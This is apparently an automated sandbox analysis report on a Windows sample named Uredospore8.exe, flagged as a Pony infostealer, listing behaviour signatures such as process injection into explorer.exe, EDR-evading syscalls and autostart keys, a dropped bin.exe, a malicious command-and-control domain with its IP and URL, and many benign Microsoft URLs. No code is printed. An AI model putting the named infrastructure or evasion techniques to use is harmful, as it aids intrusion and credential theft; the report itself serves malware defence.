    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1501381 Sample: Uredospore8.exe Startdate: 29/08/2024 Architecture: WINDOWS Score: 100 43 lkebgoxdejyq.com 2->43 45 www.google.com 2->45 47 2 other IPs or domains 2->47 61 Suricata IDS alerts for network traffic 2->61 63 Malicious sample detected (through community Yara rule) 2->63 65 Antivirus detection for URL or domain 2->65 67 9 other signatures 2->67 11 Uredospore8.exe 2->11         started        signatures3 process4 signatures5 89 Detected unpacking (changes PE section rights) 11->89 91 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 11->91 93 Contains functionality to inject threads in other processes 11->93 14 Uredospore8.exe 11->14         started        process6 signatures7 95 Writes to foreign memory regions 14->95 17 winver.exe 1 4 14->17         started        process8 dnsIp9 41 lkebgoxdejyq.com 216.218.185.162, 49711, 80 HURRICANEUS United States 17->41 39 C:\Users\user\AppData\Roaming\...\bin.exe, PE32 17->39 dropped 69 Creates autostart registry keys with suspicious names 17->69 71 Contains functionality to inject threads in other processes 17->71 73 Injects code into the Windows Explorer (explorer.exe) 17->73 75 5 other signatures 17->75 22 explorer.exe 32 2 17->22 injected 25 ctfmon.exe 17->25 injected 27 dllhost.exe 7 17->27         started        29 28 other processes 17->29 file10 signatures11 process12 dnsIp13 77 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 22->77 79 Contains functionality to inject threads in other processes 22->79 81 Writes to foreign memory regions 22->81 83 Creates a thread in another existing process (thread injection) 22->83 32 bin.exe 22->32         started        35 bin.exe 22->35         started        85 Monitors registry run keys for changes 25->85 49 173.222.162.64, 443, 49704, 49715 AKAMAI-ASUS United States 29->49 87 Found direct / indirect Syscall (likely to bypass EDR) 29->87 signatures14 process15 signatures16 51 Antivirus detection for dropped file 32->51 53 Detected unpacking (changes PE section rights) 32->53 55 Machine Learning detection for dropped file 32->55 59 2 other signatures 32->59 37 bin.exe 32->37         started        57 Creates a thread in another existing process (thread injection) 35->57 process17

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Uredospore8.exe87%ReversingLabsWin32.Infostealer.Pony
    Uredospore8.exe100%AviraHEUR/AGEN.1335517
    Uredospore8.exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe100%AviraHEUR/AGEN.1335517
    C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe100%Joe Sandbox ML
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://api.msn.com/v1/news/Feed/Windows?0%URL Reputationsafe
    https://login.windows.net0%URL Reputationsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
    https://xsts.auth.xboxlive.com0%URL Reputationsafe
    https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
    https://aefd.nelreports.net/api/report?cat=bingaotak0%URL Reputationsafe
    http://schemas.micro0%URL Reputationsafe
    https://login.windows.local0%URL Reputationsafe
    https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
    https://word.office.com0%URL Reputationsafe
    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
    https://reactjs.org/docs/error-decoder.html?invariant=0%URL Reputationsafe
    https://aefd.nelreports.net/api/report?cat=wsb0%URL Reputationsafe
    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg0%URL Reputationsafe
    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
    https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqshttps://www.msn.com/sports?OCID=WSB_TL_EL&PC=w0%Avira URL Cloudsafe
    https://login.windows.local/0%URL Reputationsafe
    https://api.msn.com/I0%Avira URL Cloudsafe
    https://substrate.office365.us0%Avira URL Cloudsafe
    https://excel.office.coms0%Avira URL Cloudsafe
    https://assets.activity.windows.com/v1/assets0%Avira URL Cloudsafe
    https://substrate.office.com0%URL Reputationsafe
    https://android.notify.windows.com/iOS0%URL Reputationsafe
    https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqs0%Avira URL Cloudsafe
    https://xsts.auth.xboxlive.comwy0%Avira URL Cloudsafe
    https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF0%Avira URL Cloudsafe
    https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp0%URL Reputationsafe
    https://assets.activity.windows.comP0%Avira URL Cloudsafe
    https://fb.me/react-polyfills0%URL Reputationsafe
    https://aefd.nelreports.net/api/report?cat=bingrms0%URL Reputationsafe
    https://api.msn.com/0%URL Reputationsafe
    https://word.office.comM0%Avira URL Cloudsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
    https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-0%Avira URL Cloudsafe
    https://mths.be/fromcodepoint0%Avira URL Cloudsafe
    https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqs0%Avira URL Cloudsafe
    https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri0%Avira URL Cloudsafe
    https://www.msn.com/de-ch/play/games/food-tycoon-frvr/cg-9nf9144n68170%Avira URL Cloudsafe
    http://lkebgoxdejyq.com/preview/100%Avira URL Cloudmalware
    https://substrate.office.com/M365.Access0%Avira URL Cloudsafe
    https://powerpoint.office.comcembere0%Avira URL Cloudsafe
    https://wns.windows.com/j0%Avira URL Cloudsafe
    https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqs0%Avira URL Cloudsafe
    https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h0%Avira URL Cloudsafe
    https://www.msn.com/de-ch/play/games/bowling-hero/cg-9n4v2151rf310%Avira URL Cloudsafe
    https://www.msn.com/de-ch/play/games/fairyland%3a-merge-%26-magic/cg-9nw8m0c50k4w0%Avira URL Cloudsafe
    https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu0%Avira URL Cloudsafe
    https://wns.windows.com/e0%Avira URL Cloudsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz0%Avira URL Cloudsafe
    https://ntp.msn.com/web-widget?form=M0%Avira URL Cloudsafe
    https://excel.office.com-0%Avira URL Cloudsafe
    https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc0%Avira URL Cloudsafe
    https://www.msn.com/de-ch/play/games/bowling-hero/cg-9n4v2151rf31"0%Avira URL Cloudsafe
    https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqs0%Avira URL Cloudsafe
    https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-0%Avira URL Cloudsafe
    https://%s.xboxlive.com0%Avira URL Cloudsafe
    https://activity.windows.comt0%Avira URL Cloudsafe
    https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c0%Avira URL Cloudsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark0%Avira URL Cloudsafe
    https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve0%Avira URL Cloudsafe
    https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA0%Avira URL Cloudsafe
    https://outlook.office.com/M365.AccessZ0%Avira URL Cloudsafe
    https://login.windows.net/0%Avira URL Cloudsafe
    https://substrate.office.com/search/api651e5875e6d946c7adbf63b2ebc3ea64https://loki.delve.office.com0%Avira URL Cloudsafe
    https://www.msn.com/de-ch/play/games/master-chess/cg-9nrl2nj7l6s10%Avira URL Cloudsafe
    https://powerpoint.office.comEMd0%Avira URL Cloudsafe
    http://schemas.live.com/Web/0%Avira URL Cloudsafe
    https://outlook.come0%Avira URL Cloudsafe
    https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the0%Avira URL Cloudsafe
    https://substrate.office.com/dsapi/v1.0/0%Avira URL Cloudsafe
    https://www.msn.com/de-ch/play/games/fairyland%3a-merge-%26-magic/cg-9nw8m0c50k4w"0%Avira URL Cloudsafe
    https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation0%Avira URL Cloudsafe
    https://substrate.office.com/SubstrateSearch-Internal.ReadWrite0%Avira URL Cloudsafe
    https://www.msn.com/de-ch/play/games/archery-king/cg-9n5gkc4t7lzz"0%Avira URL Cloudsafe
    https://assets.activity.windows.com0%Avira URL Cloudsafe
    https://www.msn.com/de-ch/play/games/food-tycoon-frvr/cg-9nf9144n6817"0%Avira URL Cloudsafe
    https://activity.windows.com0%Avira URL Cloudsafe
    https://outlook.office.com/M365.Access394866fc-eedb-4f01-8536-3ff84b16be2a72f988bf-86f1-41af-91ab-2d0%Avira URL Cloudsafe
    https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-0%Avira URL Cloudsafe
    https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei0%Avira URL Cloudsafe
    https://www.msn.com:443/en-us/feed0%Avira URL Cloudsafe
    https://www.msn.com/de-ch/play/games/master-chess/cg-9nrl2nj7l6s1"0%Avira URL Cloudsafe
    https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-0%Avira URL Cloudsafe
    https://assets.activity.windows.com/v1/assets/$batch0%Avira URL Cloudsafe
    https://%s.dnet.xboxlive.com0%Avira URL Cloudsafe
    https://xsts.auth.xboxlive.com/0%Avira URL Cloudsafe
    https://fb.me/react-polyfillsThis0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    lkebgoxdejyq.com
    216.218.185.162
    truetrue
      unknown
      www.google.com
      142.250.186.68
      truefalse
        unknown
        fp2e7a.wpc.phicdn.net
        192.229.221.95
        truefalse
          unknown
          NameMaliciousAntivirus DetectionReputation
          http://lkebgoxdejyq.com/preview/true
          • Avira URL Cloud: malware
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000004.00000000.2195839667.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqshttps://www.msn.com/sports?OCID=WSB_TL_EL&PC=wSearchApp.exe, 0000000D.00000000.2330801653.0000027A91ACA000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://login.windows.netsvchost.exe, 00000006.00000002.3364968286.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://substrate.office365.usSearchApp.exe, 0000000D.00000000.2307269362.0000027A80A2C000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://assets.activity.windows.com/v1/assetssvchost.exe, 00000006.00000002.3361155429.000001A798043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219337012.000001A798043000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://api.msn.com/Iexplorer.exe, 00000004.00000000.2195839667.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://excel.office.comsStartMenuExperienceHost.exe, 0000000A.00000000.2237868953.00000275A062D000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000A.00000002.3413264410.00000275A062D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngFexplorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://xsts.auth.xboxlive.comsvchost.exe, 00000006.00000002.3364968286.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2195839667.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000973C000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://word.office.comMexplorer.exe, 00000004.00000003.2981503378.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981993470.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3447389765.000000000C071000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2198248903.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://xsts.auth.xboxlive.comwySearchApp.exe, 0000000D.00000000.2284398647.0000027A7E2F2000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqsSearchApp.exe, 0000000D.00000000.2330801653.0000027A91ACA000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2284822249.0000027A7E3D1000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://assets.activity.windows.comPsvchost.exe, 00000006.00000002.3361155429.000001A798043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219337012.000001A798043000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://aefd.nelreports.net/api/report?cat=bingaotakSearchApp.exe, 0000000D.00000000.2273444241.000002727D37C000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://mths.be/fromcodepointSearchApp.exe, 0000000D.00000000.2274494136.0000027A7D51C000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2301318078.0000027A80184000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/de-ch/play/games/food-tycoon-frvr/cg-9nf9144n6817SearchApp.exe, 0000000D.00000000.2275895403.0000027A7D5E1000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://schemas.microexplorer.exe, 00000004.00000000.2194969646.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2194982780.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2193205458.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 0000000B.00000002.3372811032.000002C8A67C0000.00000002.00000001.00040000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameriexplorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqsSearchApp.exe, 0000000D.00000000.2284822249.0000027A7E3D1000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://login.windows.localsvchost.exe, 00000006.00000000.2219421842.000001A798088000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3363861560.000001A798088000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://substrate.office.com/M365.AccessSearchApp.exe, 0000000D.00000000.2329609042.0000027A91A70000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://powerpoint.office.comcembereStartMenuExperienceHost.exe, 0000000A.00000000.2237868953.00000275A062D000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000A.00000002.3413264410.00000275A062D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://wns.windows.com/jexplorer.exe, 00000004.00000003.2980021268.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3450243606.000000000C377000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981054570.000000000C364000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981252114.000000000C374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076032675.000000000C377000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3075818736.000000000C377000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqsSearchApp.exe, 0000000D.00000000.2330801653.0000027A91ACA000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2284822249.0000027A7E3D1000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-hexplorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-quexplorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://wns.windows.com/eexplorer.exe, 00000004.00000000.2196219993.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/de-ch/play/games/fairyland%3a-merge-%26-magic/cg-9nw8m0c50k4wSearchApp.exe, 0000000D.00000000.2275895403.0000027A7D5E1000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://word.office.comStartMenuExperienceHost.exe, 0000000A.00000000.2237868953.00000275A062D000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000A.00000002.3413264410.00000275A062D000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://www.msn.com/de-ch/play/games/bowling-hero/cg-9n4v2151rf31SearchApp.exe, 0000000D.00000000.2275895403.0000027A7D5E1000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://reactjs.org/docs/error-decoder.html?invariant=SearchApp.exe, 0000000D.00000000.2302447567.0000027A80400000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://aefd.nelreports.net/api/report?cat=wsbSearchApp.exe, 0000000D.00000000.2273444241.000002727D3A2000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2264186736.000002727C2B2000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhzexplorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://excel.office.com-explorer.exe, 00000004.00000003.2981503378.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981993470.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3447389765.000000000C071000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2198248903.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://ntp.msn.com/web-widget?form=MSearchApp.exe, 0000000D.00000000.2306449484.0000027A80982000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/de-ch/play/games/bowling-hero/cg-9n4v2151rf31"SearchApp.exe, 0000000D.00000000.2282936536.0000027A7E223000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&ocexplorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqsSearchApp.exe, 0000000D.00000000.2284822249.0000027A7E3D1000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://activity.windows.comtsvchost.exe, 00000006.00000002.3361155429.000001A798043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219337012.000001A798043000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://%s.xboxlive.comsvchost.exe, 00000006.00000000.2219376900.000001A798065000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3362446755.000001A798065000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-darkexplorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AAexplorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://login.windows.local/svchost.exe, 00000006.00000000.2219421842.000001A798088000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3363861560.000001A798088000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://outlook.office.com/M365.AccessZSearchApp.exe, 0000000D.00000000.2318850916.0000027A91528000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-cexplorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://substrate.office.comSearchApp.exe, 0000000D.00000000.2329926503.0000027A91A9C000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2302447567.0000027A80400000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2306685905.0000027A809C7000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2331674767.0000027A91B30000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reveexplorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://login.windows.net/svchost.exe, 00000006.00000002.3364968286.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://substrate.office.com/search/api651e5875e6d946c7adbf63b2ebc3ea64https://loki.delve.office.comSearchApp.exe, 0000000D.00000000.2281866725.0000027A7DF30000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://powerpoint.office.comEMdexplorer.exe, 00000004.00000000.2198248903.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3447389765.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/de-ch/play/games/master-chess/cg-9nrl2nj7l6s1SearchApp.exe, 0000000D.00000000.2275895403.0000027A7D5E1000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://schemas.live.com/Web/SearchApp.exe, 0000000D.00000000.2273444241.000002727D37C000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://android.notify.windows.com/iOSexplorer.exe, 00000004.00000003.2980021268.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3450243606.000000000C377000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2198248903.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981054570.000000000C364000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981252114.000000000C374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076032675.000000000C377000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3075818736.000000000C377000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://substrate.office.com/dsapi/v1.0/SearchApp.exe, 0000000D.00000000.2307269362.0000027A80A2C000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/de-ch/play/games/fairyland%3a-merge-%26-magic/cg-9nw8m0c50k4w"SearchApp.exe, 0000000D.00000000.2282936536.0000027A7E223000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
